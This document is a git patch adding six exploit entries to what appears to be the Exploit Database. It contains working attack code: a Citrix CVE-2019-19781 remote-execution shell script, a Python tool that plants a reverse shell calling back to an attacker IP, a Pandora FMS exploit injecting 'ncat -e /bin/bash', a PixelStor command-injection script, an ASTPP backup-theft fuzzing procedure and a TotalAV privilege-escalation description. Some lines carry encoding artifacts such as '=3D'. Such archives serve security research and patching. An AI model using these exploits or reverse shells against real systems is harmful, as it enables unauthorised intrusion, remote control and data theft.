From d3ca8599713572b6fe9d2736aafddd9b6741b065 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 11 Jan 2020 05:02:00 +0000 Subject: [PATCH] DB: 2020-01-11 6 changes to exploits/shellcodes TotalAV 2020 4.14.31 - Privilege Escalation Pandora 7.0NG - Remote Code Execution PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution ASTPP 4.0.1 VoIP Billing - Database Backup Download Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC) Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution --- exploits/linux/webapps/47900.txt | 56 ++++++++++++ exploits/multiple/webapps/47901.sh | 23 +++++ exploits/multiple/webapps/47902.py | 132 +++++++++++++++++++++++++++++ exploits/php/webapps/47898.py | 71 ++++++++++++++++ exploits/php/webapps/47899.py | 35 ++++++++ exploits/windows/local/47897.txt | 35 ++++++++ files_exploits.csv | 6 ++ 7 files changed, 358 insertions(+) create mode 100644 exploits/linux/webapps/47900.txt create mode 100755 exploits/multiple/webapps/47901.sh create mode 100755 exploits/multiple/webapps/47902.py create mode 100755 exploits/php/webapps/47898.py create mode 100755 exploits/php/webapps/47899.py create mode 100644 exploits/windows/local/47897.txt diff --git a/exploits/linux/webapps/47900.txt b/exploits/linux/webapps/47900.txt new file mode 100644 index 000000000..7f1fec921 --- /dev/null +++ b/exploits/linux/webapps/47900.txt @@ -0,0 +1,56 @@ +# Exploit Title: ASTPP 4.0.1 VoIP Billing - Database Backup Download +# Date: 2019-11-18 +# Exploit Author: Fabien AUNAY +# Vendor Homepage: https://www.astppbilling.org/ +# Software Link: https://github.com/iNextrix/ASTPP/tree/v4.0.1 +# Version: 4.0.1 vendor default setup script +# Tested on: Debian 9 - CentOS 7 +# CVE : - + +########################################################################################################### +ASTPP 4.0.1 VoIP Billing Unauthenticated Predictable database backup download + +A Smart TelePhony Platform for Individual Business, Wholesale and Residential VoIP Service Providers! +It is available as an open source solution. It means without any investment, one can start his telephony +business using ASTPP. +ASTPP, being one of the most powerful VoIP Billing Software, thrives to benefit its users by providing a +comprehensive telephony solution. This open source solution has lifted itself up from a mere VoIP billing +solution to “A Smart TelePhony Platform”. +The latest version of ASTPP is provisioned with some advanced functional modules which are designed +to eliminate the need of multiple solutions to run a VoIP business. It has integrated hosted IP PBX, Class +4/5 Softswitch, and complete invoicing and billing solution developed by leveraging Smart +Technology. + +When administrator performs a ASTPP backup in web interface (Configuration / Database Restore / Create) +the file name follows a semi-predictable pattern located in /var/www/html/astpp/database_backup/. + +The file name can be FUZZED for data exfiltration with the following pattern: astpp_20200110080136.sql.gz + +Pattern review: +- astpp_ +- year +- month +- day +- 6 PIN digit + +Steps: +Objective 1 : Generate your 6 PIN list +Objective 2 : FUZZ the target URL +Objective 3 : Download the mysqldump + +########################################################################################################### + +Objective 1: Generate your 6 PIN list +POC: crunch 6 6 0123456789 > pin_fuzzer.list + +Objective 2 : FUZZ the target URL +POC: wfuzz --hc 302 -w pin_fuzzer.list 'http://127.0.0.1/database_backup/astpp_20200110FUZZ.sql.gz' +=================================================================== +ID Response Lines Word Chars Payload +=================================================================== + +000080137: 200 1135 L 6859 W 550239 Ch "080136" + +Objective 3 : Download the mysqldump +POC: wget http://127.0.0.1/database_backup/astpp_20200110080136.sql.gz +astpp_20200110080136.sql.gz 100%[===============================================================================>] 296,70K 1,05MB/s ds 0,3 \ No newline at end of file diff --git a/exploits/multiple/webapps/47901.sh b/exploits/multiple/webapps/47901.sh new file mode 100755 index 000000000..f9e4d7557 --- /dev/null +++ b/exploits/multiple/webapps/47901.sh @@ -0,0 +1,23 @@ +#!/bin/bash +# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781 +# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a' +# Release Date : 11/01/2020 +# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia +echo "================================================================================= + ___ _ _ ____ ___ _ _ +| _ \ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _ +| _/| '_|/ _ \ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \ | | | ' \ / _' || |/ _' | +|_| |_| \___/_/ |\___|\__| \__| /___|\___||_| \___/ |___||_||_|\__,_||_|\__,_| + |__/ CVE-2019-19781 +=================================================================================" +############################## +if [ -z "$1" ]; +then +echo -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\n' +exit; +fi +filenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1); +curl -s -k "https://$1/vpn/../vpns/portal/scripts/newbm.pl" -d "url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'$2 | tee /netscaler/portal/templates/$filenameid.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb" -H "NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is +echo -ne "\n" ;curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -s -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is +echo -ne "Command Output :\n" +curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is \ No newline at end of file diff --git a/exploits/multiple/webapps/47902.py b/exploits/multiple/webapps/47902.py new file mode 100755 index 000000000..a9c4d655b --- /dev/null +++ b/exploits/multiple/webapps/47902.py @@ -0,0 +1,132 @@ +#!/usr/bin/python3 +# +# Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 +# +# You only need a listener like netcat to catch the shell. +# +# Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White +# +# Tool Written by: Rob Simon and David Kennedy + +import requests +import urllib3 +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings +import random +import string +import time +from random import randint +import argparse +import sys + +# random string generator +def randomString(stringLength=10): + letters = string.ascii_lowercase + return ''.join(random.choice(letters) for i in range(stringLength)) + +# our random string for filename - will leave artifacts on system +filename = randomString() +randomuser = randomString() + +# generate random number for the nonce +nonce = randint(5, 15) + +# this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script +# note that the file location will be in /netscaler/portal/templates/filename.xml +def stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport): + + # encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC) + encoded = "" + i=0 + text = ("""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'""" % (attackerip, attackerport)) + while i < len(text): + encoded = encoded + "chr("+str(ord(text[i]))+") . " + i += 1 + encoded = encoded[:-3] + payload="[% template.new({'BLOCK'='print readpipe(" + encoded + ")'})%]" + headers = ( + { + 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0', + 'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename), + 'NSC_NONCE' : '%s' % (nonce), + }) + + data = ( + { + "url" : "127.0.0.1", + "title" : payload, + "desc" : "desc", + "UI_inuse" : "a" + }) + + url = ("https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl" % (victimip, victimport)) + requests.post(url, data=data, headers=headers, verify=False) + +# this is our second stage that triggers the exploit for us +def stage2(filename, randomuser, nonce, victimip, victimport): + headers = ( + { + 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0', + 'NSC_USER' : '%s' % (randomuser), + 'NSC_NONCE' : '%s' % (nonce), + }) + + requests.get("https://%s:%s/vpn/../vpns/portal/%s.xml" % (victimip, victimport, filename), headers=headers, verify=False) + + +# start our main code to execute +print(''' + + .o oOOOOOOOo OOOo + Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO + OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO + OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB' + `O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo + .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO + OOOOO '"OOOOOOOOOOOOOOOO"` oOO + oOOOOOba. .adOOOOOOOOOOba .adOOOOo. + oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO + OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO + "OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO" + Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :` + : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? . + . oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo + '%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO': + `$" `OOOO' `O"Y ' `OOOO' o . + . . OP" : o . + : + +Citrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 +Tool Written by: Rob Simon and Dave Kennedy +Contributions: The TrustedSec Team +Website: https://www.trustedsec.com +INFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/ + +This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used +to append files in an XML format to the victim machine. This in turn allows for remote code execution. + +Be sure to cleanup these two file locations: + /var/tmp/netscaler/portal/templates/ + /netscaler/portal/templates/ + +Usage: + +python citrixmash.py \n''') + +# parse our commands +parser = argparse.ArgumentParser() +parser.add_argument("target", help="the vulnerable server with Citrix (defaults https)") +parser.add_argument("targetport", help="the target server web port (normally on 443)") +parser.add_argument("attackerip", help="the attackers reverse listener IP address") +parser.add_argument("attackerport", help="the attackersa reverse listener port") +args = parser.parse_args() +print("[*] Firing STAGE1 POST request to create the XML template exploit to disk...") +print("[*] Saving filename as %s.xml on the victim machine..." % (filename)) +# trigger our first post +stage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport) +print("[*] Sleeping for 2 seconds to ensure file is written before we call it...") +time.sleep(2) +print("[*] Triggering GET request for the newly created file with a listener waiting...") +print("[*] Shell should now be in your listener... enjoy. Keep this window open..") +print("[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/") +# trigger our second post +stage2(filename, randomuser, nonce, args.target, args.targetport) \ No newline at end of file diff --git a/exploits/php/webapps/47898.py b/exploits/php/webapps/47898.py new file mode 100755 index 000000000..4cd329aa0 --- /dev/null +++ b/exploits/php/webapps/47898.py @@ -0,0 +1,71 @@ +# Exploit Title: Pandora 7.0NG - Remote Code Execution +# Date: 2019-11-14 +# Exploit Author: Askar (@mohammadaskar2) +# CVE: CVE-2019-20224 +# Vendor Homepage: https://pandorafms.org/ +# Software link: https://pandorafms.org/features/free-download-monitoring-software/ +# Version: v7.0NG +# Tested on: CentOS 7.3 / PHP 5.4.16 + +#!/usr/bin/python3 + +import requests +import sys + +if len(sys.argv) !=3D 6: + print("[+] Usage : ./exploit.py target username password ip port") + exit() + +target =3D sys.argv[1] +username =3D sys.argv[2] +password =3D sys.argv[3] +ip =3D sys.argv[4] +port =3D int(sys.argv[5]) + +request =3D requests.session() + +login_info =3D { + "nick": username, + "pass": password, + "login_button": "Login" +} + +login_request =3D request.post( + target+"/pandora_console/index.php?login=3D1", + login_info, + verify=3DFalse, + allow_redirects=3DTrue + ) + +resp =3D login_request.text + +if "User not found in database" in resp: + print("[-] Login Failed") + exit() +else: + print("[+] Logged In Successfully") + +print("[+] Sending crafted graph request ..") + +body_request =3D { + "date": "0", + "time": "0", + "period": "0", + "interval_length": "0", + "chart_type": "netflow_area", + "max_aggregates": "1", + "address_resolution": "0", + "name": "0", + "assign_group": "0", + "filter_type": "0", + "filter_id": "0", + "filter_selected": "0", + "ip_dst": "0", + "ip_src": '";ncat -e /bin/bash {0} {1} #'.format(ip, port), + "draw_button": "Draw" +} + +draw_url =3D target + "/pandora_console/index.php?sec=3Dnetf&sec2=3Doperati= +on/netflow/nf_live_view&pure=3D0" +print("[+] Check your netcat ;)") +request.post(draw_url, body_request) \ No newline at end of file diff --git a/exploits/php/webapps/47899.py b/exploits/php/webapps/47899.py new file mode 100755 index 000000000..d134556d8 --- /dev/null +++ b/exploits/php/webapps/47899.py @@ -0,0 +1,35 @@ +# Exploit Title: PixelStor 5000 - Remote Code Execution +# Product: PixelStor 5000 +# Vendor: Rasilient +# Date: 2020-01-08 +# Exploit Author: .:UND3R:. +# Vendor Homepage: http://rasilient.com +# Version: K:4.0.1580-20150629 (KDI Version) +# Tested on: K:4.0.1580-20150629 (KDI Version) +# CVE: CVE-2020-6756 +# URL Author: https://pwnedchile.com +# Thanks: Dani Pelotocino <3, Roit + +import requests, sys + +def poc(target, cmd): + url = target + "/Option/languageOptions.php" + headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close", "Upgrade-Insecure-Requests": "1"} + data = {"lang": ";" + cmd + ";/bin/echo -n en"} + r = requests.post(url, headers=headers, data=data) + if(r.status_code == 200): + print("\nPwned :]") + else: + print("\nNot vulnerable :(") + +print("PixelStor 5000 RCE exploit\nVersion: K:4.0.1580-20150629 (KDI Version)\n\nAuthor: .:UND3R:.\nURL: https://pwnedchile.com\nThanks: Dani Pelotocino <3") + +if len(sys.argv) !=2: + print("\n[+] Usage: python " + sys.argv[0] + " \n") + sys.exit(1) + +if __name__ == "__main__": + url = sys.argv[1] + cmd = raw_input("\n[Linux Command]:") + poc(url, cmd) +#EoF \ No newline at end of file diff --git a/exploits/windows/local/47897.txt b/exploits/windows/local/47897.txt new file mode 100644 index 000000000..a189b38d9 --- /dev/null +++ b/exploits/windows/local/47897.txt @@ -0,0 +1,35 @@ +# Exploit Title: TotalAV 2020 4.14.31 - Privilege Escalation +# Date: 2020-01-09 +# Exploit Author: Kusol Watchara-Apanukorn +# Vendor Homepage: https://www.totalav.com/ +# Version: 4.14.31 +# Fixed on: 5.3.35 +# Tested on: Windows 10 x64 +# CVE : N/A + +# Vulnerability Description: +# TotalAV 2020 4.14.31 has quarantine flaw that allows attacker escape of +# privilege by using NTFS directory junction. + +**You can download vulnerability version with this link: +https://install.protected.net/windows/cdn3/4.14.31/TotalAV_Setup.exe + +/////////////////////////////////// + Proof of Concept +////////////////////////////////// +1. Plant the malicious file in this case we use DLL file +2. To exploit the vulnerability antivirus must detect the malicious dll +3. Move it to quarantine. +4. Attacker must create NTFS directory junction to restore + +Full step: https://www.youtube.com/watch?v=88qeaLq98Gc + + +Vulnerability Disclosure Timeline: +================================== +17 Oct, 19 : Found Vulnerability +18 Oct, 19 : Vendor Notification +18 Oct, 19 : Request CVE +21 Oct, 19 : Vendor Response +mid Dec, 19 : Vendor released new patched (v5.3.35) +09 Jan, 20: Vulnerability Disclosure \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 908a6b63f..f4819a342 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10887,6 +10887,7 @@ id,file,description,date,author,type,platform,port 47880,exploits/windows/local/47880.cc,"Windows - Shell COM Server Registrar Local Privilege Escalation",2020-01-02,0vercl0k,local,windows, 47883,exploits/windows/local/47883.txt,"AnyDesk 5.4.0 - Unquoted Service Path",2020-01-07,SajjadBnd,local,windows, 47896,exploits/xml/local/47896.txt,"MSN Password Recovery 1.30 - XML External Entity Injection",2020-01-09,ZwX,local,xml, +47897,exploits/windows/local/47897.txt,"TotalAV 2020 4.14.31 - Privilege Escalation",2020-01-10,"Kusol Watchara-Apanukorn",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42197,3 +42198,8 @@ id,file,description,date,author,type,platform,port 47892,exploits/java/webapps/47892.txt,"Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape",2020-01-08,hantwister,webapps,java, 47893,exploits/hardware/webapps/47893.js,"Sony Playstation 4 (PS4) < 6.72 - WebKit Code Execution (PoC)",2019-12-31,"TJ Corley",webapps,hardware, 47895,exploits/java/webapps/47895.py,"Oracle Weblogic 10.3.6.0.0 - Remote Command Execution",2020-01-09,james,webapps,java, +47898,exploits/php/webapps/47898.py,"Pandora 7.0NG - Remote Code Execution",2020-01-10,Askar,webapps,php, +47899,exploits/php/webapps/47899.py,"PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution",2020-01-10,.:UND3R:.,webapps,php, +47900,exploits/linux/webapps/47900.txt,"ASTPP 4.0.1 VoIP Billing - Database Backup Download",2020-01-10,"Fabien AUNAY",webapps,linux, +47901,exploits/multiple/webapps/47901.sh,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)",2020-01-11,"Project Zero India",webapps,multiple, +47902,exploits/multiple/webapps/47902.py,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution",2020-01-11,TrustedSec,webapps,multiple,